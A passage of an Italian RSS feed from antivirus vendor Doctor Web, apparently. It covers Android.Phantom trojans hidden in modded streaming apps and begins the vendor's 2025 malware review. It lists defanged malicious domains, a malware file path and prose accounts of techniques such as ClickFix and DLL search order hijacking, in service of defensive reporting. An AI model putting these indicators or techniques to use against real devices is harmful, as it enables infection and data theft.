iscritti)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Spotify Plus – Official&lt;/i&gt;&lt;br&gt;&lt;i&gt;(15.057 iscritti)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Le mod Spotify collocate sui siti e nei canali Telegram indicati sugli screenshot contengono&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;e la libreria per l'organizzazione della comunicazione secondo lo standard WebRTC su Android.&lt;/p&gt;&lt;p&gt;Oltre alle mod Spotify, i malintenzionati incorporano i trojan in mod di altre applicazioni popolari: YouTube, Deezer, Netflix ecc. Sono pubblicate su siti speciali con mod:&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sito Apkmody&lt;/i&gt;&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Sito Moddroid&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Il sito Moddroid contiene una sezione "Scelta della redazione". Di 20 applicazioni in essa elencate solo 4 erano pulite. Le altre 16 contenevano i trojan della famiglia &lt;strong&gt;Android.Phantom&lt;/strong&gt;. Le app su questi due siti vengono scaricate da uno stesso server CDN &lt;span class="string"&gt;hxxps[:]//cdn[.]topmongo[.]com&lt;/span&gt;. Questi siti hanno i propri canali Telegram dove gli utenti scaricano le mod infette dai trojan:&lt;/p&gt;&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Moddroid.com&lt;/i&gt;&lt;br&gt;&lt;i&gt;(87.653 iscritti)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="flex flex-col gap-1"&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Apkmody Chat&lt;/i&gt;&lt;br&gt;&lt;i&gt;(6.297 iscritti)&lt;/i&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;p class="mt-5"&gt;Inoltre, per i loro scopi i criminali utilizzano anche server Discord. Il più grande di essi è Spotify X, circa 24mila iscritti.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Gli amministratori dei server Discord non esitano ad offrire direttamente le mod infette. Ad esempio, sullo screenshot sopra, un amministratore a nome del server suggerisce di scaricare una mod dello streaming musicale Deezer invece di Spotify, in quanto quest'ultima non funziona.&lt;/p&gt;&lt;p&gt;Al link viene scaricato una mod funzionante. Il suo codice è protetto da un packer commerciale, all'interno del quale è nascosto il trojan&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;. Questo è un downloader di codice remoto, su comando del server &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; esso scarica i malware che già conosciamo&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;,&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&amp;nbsp;e il trojan spia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;. Quest'ultimo invia informazioni sul dispositivo ai malintenzionati, incluso il numero di telefono, la geolocalizzazione, la lista di app installate.&lt;/p&gt;&lt;div class="img mb-3"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Questo screenshot dal server mostra quali lingue parlano gli utenti che diventano bersaglio di infezione. Per accedere alle chat in lingue diverse dall'inglese, è necessario mettere una reazione con la bandiera corrispondente. Il numero di utenti maggiore ha segnato lo spagnolo, francese, tedesco, polacco e italiano (senza contare l'inglese che è la lingua principale del server). Inoltre, gli amministratori del server non hanno previsto chat per molti paesi di Asia.&lt;/p&gt;&lt;p&gt;I trojan possono arrecare un significativo danno ai proprietari dei dispositivi infetti. Elenchiamo alcuni possibili esiti:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;&lt;strong&gt;Complicità involontaria.&lt;/strong&gt; Lo smartphone dell'utente può essere utilizzato come bot in un attacco DDoS, rendendo con ciò il proprietario complice involontario in un crimine cyber.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Attività illegale.&lt;/strong&gt; Tramite il dispositivo, i malintenzionati possono commettere attività online illegali, ad esempio, utilizzare lo smartphone in schemi fraudolenti o inviare messaggi spam.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Consumo eccessivo di batteria e traffico.&lt;/strong&gt; Le attività estranee scaricano la batteria e consumano il traffico internet.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Fuga di dati personali.&lt;/strong&gt; &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt; è una spia e può trasmettere dati sul dispositivo e proprietario.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;I trojan di questa famiglia rappresentano una minaccia per i proprietari di dispositivi mobili Android non protetti da un software antivirus aggiornato. Gli utenti russi riscontrano difficoltà con la registrazione in applicazioni e il pagamento di abbonamenti esteri. La situazione spinge a cercare e utilizzare metodi alternativi, spesso semi-legali, per l'ottenimento dei servizi di tali aziende. Questa situazione è favorevole agli autori di virus, in quanto gli utenti devono rischiare e fidarsi di varianti dubbie. Un gruppo a rischio particolare sono i bambini che non pensano alle regole dell'igiene digitale, volendo solo giocare, ascoltare musica o guardare videoclip.&lt;/p&gt;&lt;p&gt;Vi consigliamo di non scaricare mod su siti e in canali dubbi. Di regola, la verifica di fonti di mod o app richiede tempo, esperienza ed esperienza visiva accumulata. Pertanto, la migliore variante per procurare a sé stessi e ai propri cari una tranquillità garantita è utilizzare Dr.Web Security Space per dispositivi mobili. Esso proteggerà non solo i vostri smartphone, ma anche altri dispositivi intelligenti: console di gioco, tablet, smart TV.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Phantom/README.adoc"&gt;Indicatori di compromissione&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.3&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.3&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.4.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15102&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per l'anno 2025</title><link>https://news.drweb-av.it/show/?i=15102&amp;lng=it&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;15 gennaio 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Nel 2025 una delle minacce più attive sono stati i trojan progettati per la visualizzazione della pubblicità. Gli utenti riscontravano anche i vari script malevoli ed applicazioni trojan che avviano nel sistema infetto altri malware. Nel traffico email con la maggiore frequenza venivano rilevati i programmi trojan downloader, backdoor, exploit, script malevoli e documenti di phishing.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Tra le minacce mobili, sono stati i più diffusi i trojan pubblicitari e i programmi falsificazione utilizzati in vari schemi fraudolenti. Si registrava anche una crescita dell'attività dei trojan bancari. Oltre a questo, gli analisti dei virus Doctor Web hanno individuato decine di nuovi programmi malevoli, indesiderati e pubblicitari sullo store di app Google Play.&lt;/p&gt;

&lt;p&gt;Rispetto al 2024, è diminuito il numero di richieste degli utenti per la decriptazione di file. Allo stesso tempo, durante l'anno i nostri analisti internet registravano una crescita del numero di siti fraudolenti creati per rubare gli account utente del programma di messaggistica Telegram. Di nuovo erano diffusi anche i siti indesiderati a tema finanziario.&lt;/p&gt;

&lt;p&gt;Nel 2025 il laboratorio antivirus Doctor Web ha investigato diversi attacchi mirati, uno di cui era diretto a un'impresa metalmeccanica russa. Nel corso dell'attacco, i malintenzionati utilizzavano una serie di applicazioni malevole, con cui cercavano di ottenere dati confidenziali dai computer infetti. I nostri specialisti hanno stabilito che nell'attacco era coinvolto un gruppo di hacker chiamato Scaly Wolf. Un altro incidente ha interessato un ente pubblico russo che è stato attaccato da un gruppo di hacker con il nome Cavalry Werewolf. Gli analisti dei virus Doctor Web hanno individuato numerosi strumenti malevoli dei malintenzionati, nonché hanno esaminato le caratteristiche del gruppo e le azioni tipiche di esso all'interno di reti compromesse.&lt;/p&gt;

&lt;p&gt;Durante il 2025, l'azienda Doctor Web ha riferito una serie di altri incidenti di sicurezza informatica. A gennaio il nostro laboratorio dei virus ha individuato un'attiva campagna di mining della criptovaluta Monero, organizzata con l'impiego di molteplici programmi malevoli di vario genere. E ad aprile abbiamo informato di un trojan trovato nel firmware di una serie di modelli di smartphone Android. Tramite di esso i cybercriminali rubavano criptovalute. Inoltre, ad aprile i nostri specialisti hanno individuato un trojan Android che i malintenzionati avevano inserito in una delle versioni di un popolare programma cartografico e utilizzavano per spiare i militari russi.&lt;/p&gt;

&lt;p&gt;A luglio gli esperti Doctor Web hanno parlato di una nuova famiglia di trojan creati per rubare criptovalute e password. I malintenzionati li distribuivano con il pretesto di mod, cheat e patch per giochi. Ad agosto gli analisti dei virus hanno avvertito della diffusione di un backdoor multifunzionale per dispositivi mobili, che era mirato ai rappresentanti del business russo. I criminali informatici lo gestivano in remoto, rubando per il suo tramite dati confidenziali e spiando le vittime.&lt;/p&gt;

&lt;p&gt;Ad ottobre abbiamo raccontato di un backdoor per dispositivi Android, che i cybercriminali distribuiscono come parte di versioni modificate del programma di messaggistica Telegram X. Questo programma malevolo ruba i login e le password degli account Telegram e anche altri dati confidenziali. Per il suo tramite, gli attori di minacce possono gestire gli account hackerati delle vittime e controllare completamente il programma di messaggistica stesso, effettuando varie azioni a nome degli utenti.&lt;/p&gt;

&lt;p&gt;A dicembre sul nostro sito web è stato pubblicato un materiale su un trojan che "gonfia" la popolarità di siti, e per questo scopo si finge umano dimodoché le sue attività non vengano bloccate dalla protezione antibot delle piattaforme internet. Il programma malevolo cerca in autonomo i siti necessari nei motori di ricerca, li apre ed esegue clic sulle pagine web in base ai parametri ricevuti dai malintenzionati.&lt;/p&gt;

&lt;p&gt;Nel 2025 c'è stato anche un aumento della popolarità degli attacchi ClickFix, in cui i malintenzionati utilizzano il social engineering per indurre gli utenti ad eseguire un codice malevolo sui loro dispositivi.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze dell'anno&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Si registrava un'alta attività dei trojan pubblicitari&lt;/li&gt;
        &lt;li&gt;Avvenuti nuovi attacchi mirati&lt;/li&gt;
        &lt;li&gt;Si osservava una crescita della popolarità degli attacchi con l'uso del metodo ClickFix&lt;/li&gt;
        &lt;li&gt;Diminuito il numero di incidenti con i programmi trojan ransomware di criptazione&lt;/li&gt;
        &lt;li&gt;Aumentato il numero di rilevamenti dei trojan bancari per Android&lt;/li&gt;
        &lt;li&gt;Rivelati nuovi casi di infezione dei firmware di dispositivi Android&lt;/li&gt;
        &lt;li&gt;Sullo store Google Play di nuovo venivano distribuiti programmi malevoli e indesiderati&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Eventi più interessanti del 2025&lt;/h3&gt;

&lt;p&gt;A gennaio 2025 gli specialisti Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=14976" target="_blank"&gt;hanno individuato&lt;/a&gt; una campagna di mining della criptovaluta Monero effettuata con l'utilizzo del cryptominer malevolo SilentCryptoMiner. I suoi file erano camuffati da vari software, ad esempio, programmi per videochiamate. Infettando i computer, essi eliminavano altri cryptominer che potevano essere stati precedentemente installati nel sistema. In questa campagna, per la distribuzione di alcuni componenti malevoli, i malintenzionati utilizzavano la steganografia — tecnica che consente di celare dati tra altri dati (ad esempio, in immagini). Dopo il download delle immagini appositamente formate, i componenti corrispondenti di SilentCryptoMiner venivano estratti da esse e avviati.&lt;/p&gt;

&lt;p&gt;Ad aprile i nostri analisti dei virus &lt;a href="https://news.drweb-av.it/show/?i=15002" target="_blank"&gt;hanno informato&lt;/a&gt; di un trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, rilevato nel firmware di una serie di modelli economici di smartphone Android. I malintenzionati l'avevano incorporato in una versione modificata dell'app di messaggistica WhatsApp, che quindi avevano preinstallato su dispositivi, compromettendo la catena di fornitura di alcuni produttori. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; intercetta i messaggi inviati e ricevuti nell'app di messaggistica, cerca in essi indirizzi di portafogli delle criptovalute Tron ed Ethereum, e li sostituisce con indirizzi appartenenti ai cybercriminali. Allo stesso tempo, il trojan occulta la sostituzione furtiva, e le vittime vedono in tali messaggi gli indirizzi di portafogli corretti.&lt;/p&gt;

&lt;p&gt;Lo stesso mese, gli esperti Doctor Web hanno individuato un trojan Android, chiamato &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, che i malintenzionati avevano incorporato in una delle versioni del programma cartografico Alpine Quest e utilizzavano per spiare i militari russi. L'applicazione malevola raccoglieva informazioni confidenziali e consentiva agli attaccanti di rubare file dai dispositivi infetti.&lt;/p&gt;

&lt;p&gt;A luglio sul sito dell'azienda Doctor Web è stato pubblicato un &lt;a href="https://news.drweb-av.it/show/?i=15036" target="_blank"&gt;materiale&lt;/a&gt; sui programmi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Scavenger&amp;lng=it"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt;, progettati il furto di criptovalute e password. I malintenzionati li distribuivano con il pretesto di mod, cheat e patch per giochi. Queste applicazioni malevole venivano avviate con l'utilizzo di software legittimi, tra l'altro, tramite lo sfruttamento in essi delle vulnerabilità di classe DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;Ad agosto i nostri specialisti &lt;a href="https://news.drweb-av.it/show/?i=15047" target="_blank"&gt;hanno avvisato&lt;/a&gt; della diffusione di un backdoor multifunzionale, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, che era mirato ai rappresentanti di aziende russe. L'applicazione malevola sotto le apparenze di un antivirus si diffondeva tramite messaggi privati nelle applicazioni di messaggistica. Entrando nei dispositivi target, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; raccoglieva dati confidenziali e permetteva agli attaccanti di spiare le vittime.&lt;/p&gt;

&lt;p&gt;Oltre a ciò, ad agosto il laboratorio antivirus Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15046" target="_blank"&gt;ha pubblicato un'indagine&lt;/a&gt; su un attacco mirato effettuato da un gruppo di hacker, Scaly Wolf, a un'impresa metalmeccanica russa. I cybercriminali hanno utilizzato un intero set di strumenti malevoli, tra cui uno dei principali è stato un backdoor modulare Updatar. Consentiva agli attaccanti di raccogliere dati riservati dai computer infetti.&lt;/p&gt;

&lt;p&gt;Ad ottobre gli esperti Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15076" target="_blank"&gt;hanno parlato&lt;/a&gt; di un backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, incorporato in versioni modificate dai malintenzionati del programma di messaggistica Telegram X. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; ruba i login e le password degli account Telegram, nonché sottrae una serie di altri dati confidenziali. Il programma malevolo consente ai malintenzionati di ottenere il completo controllo dell'account dell'utente e gestire il programma di messaggistica eseguendo in esso azioni a nome della vittima. Ad esempio, gli attaccanti possono impercettibilmente aderire a canali Telegram e abbondonarli, nonché nascondere nuovi dispositivi autorizzati nell'interfaccia della modificazione trojan di Telegram X.&lt;/p&gt;

&lt;p&gt;A novembre abbiamo pubblicato uno &lt;a href="https://news.drweb-av.it/show/?i=15078" target="_blank"&gt;studio&lt;/a&gt; di un attacco mirato di un gruppo di hacker, Cavalry Werewolf, a un ente pubblico russo. Analizzando l'incidente, gli esperti Doctor Web hanno individuato numerosi strumenti malevoli dei cybercriminali, inclusi strumenti a codice sorgente aperto. Gli analisti dei virus hanno esaminato le caratteristiche del gruppo di hacker e hanno scoperto che i suoi partecipanti preferiscono utilizzare backdoor con la funzionalità di reverse shell e spesso adoperano Telegram API per la gestione dei computer infetti. Inoltre, iniziano gli attacchi inviando email di phishing presumibilmente a nome di enti pubblici e allegando a tali messaggi software malevoli mascherati da vari documenti ufficiali.&lt;/p&gt;

&lt;p&gt;A dicembre l'azienda Doctor Web ha pubblicato &lt;a href="https://news.drweb-av.it/show/?i=15090" target="_blank"&gt;un'analisi&lt;/a&gt; di un'applicazione malevola, &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.ChimeraWire&amp;lng=it"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, che aumenta artificialmente la popolarità di siti fingendo di essere una persona. L'applicazione trojan cerca in autonomo i siti necessari nei motori di ricerca Google e Bing, li apre ed esegue clic sulle pagine web caricate in base ai compiti ricevuti dai malintenzionati. &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.ChimeraWire&amp;lng=it"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; viene installato sui computer con l'ausilio di una serie di programmi malevoli che sfruttano le vulnerabilità di classe DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;Durante il 2025, si osservava una crescita della popolarità degli attacchi con l'utilizzo del metodo ClickFix. Consiste in quello che i malintenzionati sfruttano il social engineering spingendo con inganno le potenziali vittime ad eseguire autonomamente un codice malevolo. Quando gli utenti vanno su un sito malevolo o compromesso, quest'ultimo li informa di un presunto errore o della necessità di aggiornare il browser e suggerisce di "risolvere" il problema. Per questo scopo, a secondo della variante di attacco, agli utenti viene chiesto o di copiare le stringhe indicate sulla pagina o di cliccare semplicemente sul pulsante corrispondente (ad esempio, "Aggiorna" o "Risolvi"). In quest'ultimo caso, il contenuto richiesto verrà automaticamente copiato negli appunti. Quindi viene chiesto a loro di aprire il prompt dei comandi o il terminale PowerShell, incollare in esso il contenuto degli appunti e premere il tasto Invio. Come risultato, le vittime eseguono autonomamente un codice malevolo, il quale avvia una catena di infezione del computer. Maggiori informazioni sugli attacchi ClickFix possono essere trovate nel &lt;a href="https://news.drweb-av.it/show/?i=15074" target="_blank"&gt;materiale&lt;/a&gt; corrispondente sul nostro sito.&lt;/p&gt;

&lt;h3&gt;Situazione di virus&lt;/h3&gt;

&lt;p&gt;Secondo i dati delle statistiche di rilevamento dell'antivirus Dr.Web, nel 2025 il numero totale di minacce rilevate è cresciuto del 5,45% rispetto al 2024. Il numero di minacce uniche è diminuito del 15,89%. Il più spesso gli utenti affrontavano i vari script malevoli e i trojan pubblicitari. Inoltre, risultavano diffusi i trojan utilizzati per l'avvio di altri programmi malevoli. Gli utenti di nuovo riscontravano anche le applicazioni trojan create in linguaggio di scripting AutoIt e distribuite come parte di altri malware per la complicazione del loro rilevamento.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo che in ciclo infinito cerca finestre con il testo &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; e &lt;span class="string"&gt;розробника&lt;/span&gt; e invia ad esse un evento di clic sul pulsante Escape, chiudendole forzatamente.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un componente malevolo di un'estensione browser WinSafe. Questo componente rappresenta uno script JavaScript che visualizza pubblicità invadenti nei browser.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8319&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8326&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8332&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di script XML malevoli che avviano il trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; e i suoi componenti.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Processo host di un framework Electron modificato dai malintenzionati, che si mimetizza da componente dell'applicazione Steam (Steam Client WebHelper) e carica un backdoor JavaScript.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.MalVpn.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo utilizzato da vari programmi malevoli per la connessione ai server di comando e controllo.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan scritto nel linguaggio di programmazione Go e studiato per caricare nel sistema di destinazione vari cryptominer e software pubblicitari. Il programma malevolo è un file DLL e si trova in &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Per avviarsi, sfrutta la vulnerabilità di classe DLL Search Order Hijacking nel client torrent uTorrent.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;Nel traffico email nel 2025 venivano riscontrati con la maggiore frequenza i programmi trojan che scaricavano e installavano altri malware. I malintenzionati distribuivano tramite messaggi email anche i vari backdoor, exploit, documenti di phishing e script malevoli.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Famiglia di trojan downloader che utilizzano vulnerabilità in documenti Microsoft Office. Sono studiati per scaricare altri programmi malevoli sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Exploit per l'utilizzo di vulnerabilità nel software Microsoft Office, che consentono di eseguire codice arbitrario.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.684&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo nel linguaggio JavaScript che genera una pagina web di phishing.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;BackDoor.AgentTeslaNET.20&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma malevolo spia studiato per il furto di informazioni confidenziali. Ad esempio, raccoglie e trasmette ai malintenzionati i login e le password da numerose applicazioni, come browser, programmi di messaggistica, client di posta, database ecc. Anche ruba dati dagli appunti, realizza la funzionalità di keylogger e può catturare schermate (screenshot).&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Win32.Expiro.153&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Virus di file che infetta file eseguibili Windows. Il suo scopo principale consiste nel furto di password da vari programmi.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.DownLoader.1225&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento euristico per gli archivi ZIP contenenti script JavaScript con nomi sospetti.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.PackedNET.3223&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi malevoli protetti tramite packer.&lt;/dd&gt;
